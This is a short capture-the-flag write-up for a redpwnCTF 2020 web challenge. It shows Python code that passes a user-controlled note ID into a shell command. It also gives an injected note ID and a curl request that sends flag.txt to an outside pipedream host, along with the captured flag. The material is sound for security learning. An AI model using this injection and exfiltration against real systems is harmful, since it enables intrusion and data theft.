Tags: unintended command-injection web
Rating:
I might have found an unintentional solution:)
In `api/server.py` there is a get_note function that uses `subprocess.Popen`. We can inject code into here, because we control the note ID we would like to GET.
```python
def get_note(nid):
stdout, stderr = subprocess.Popen(f"cat 'notes/{nid}' || echo it did not work btw", shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE).communicate()
if stderr:
print(stderr) # lemonthink
return {}
return {
'success' : True,
'title' : nid,
'contents' : stdout.decode('utf-8', errors = 'ignore')
}
```
We can use Curl to exfiltrate `flag.txt` to our domain. I used requestbin here and sent a post request with the data from flag.txt.
We want to use `x';curl enydkdjvlgmx.x.pipedream.net --data @flag.txt;'` as our note ID
```
curl -v "http://2020.redpwnc.tf:31957/notes/x'%3bcurl%20enydkdjvlgmx.x.pipedream.net%20--data%20%40flag.txt%3b'"
```
This yields the flag
```
flag{y0u_b3tt3r_n0t_m@k3_m3_l0s3_my_pyth0n_d3v_j0b}
```